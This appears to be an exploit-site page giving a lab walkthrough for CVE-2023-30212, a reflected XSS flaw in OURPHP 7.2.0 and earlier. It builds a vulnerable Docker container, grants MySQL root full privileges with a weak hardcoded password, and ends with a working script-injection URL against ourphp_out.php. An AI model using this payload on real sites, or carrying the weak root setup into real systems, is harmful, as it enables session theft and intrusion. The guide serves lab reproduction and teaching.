Share
## https://sploitus.com/exploit?id=C96F7F94-2E5D-5A57-B19A-2F6DA8535C10
# Creating a Vulnerable Docker Environment (CVE-2023-30212)

## **Description**
CVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. 
This vulnerability allows for Cross-Site Scripting (XSS) attacks

OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php

 ># Steps

- **letā€™s download  Dockerfile**
 
- **Open Terminal in the folder where you downloaded theĀ dockerfile**

- **Install Docker on your machine**

  kali@kali:~$sudo apt install -y docker.io
  

- **Create a new Docker image**

  kali@kali:~$docker build -t test
 
- **Create a new Docker container**

  kali@kali:~$ docker run -d -p 80:80 test
  
 ># Configure the web
 
 - **Take Docker shell**

   kali@kali:~$docker ps
   
   **Now get the containerĀ id like 0ac7c99ad8e7**
   
   kali@kali:~ docker exec -it 0ac7c99ad8e7 /bin/bash
   
   root@0ac7c99ad8e7:/var/www/html# 
   
   **Now get the docker shell**
   
  - **Set up the database**

  root@0ac7c99ad8e7:/var/www/html# mysql
  
 **Then type these comments:-**
 
 -GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
 
 -FLUSH PRIVILEGES;
 
   *The command you provided is a MySQL or MariaDB statement used to grant all privileges to the 'root' user on all databases and tables. Let's break down the components of the    command*
 
 **Now the password is set, now go to the website and enter the passwordĀ andĀ configure**
 
 
  ># Exploiting vulnerability
 

  url :- http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
  
  
  *This website is xss vulnerable because xss script is hit when you enter thisĀ urlĀ parameter*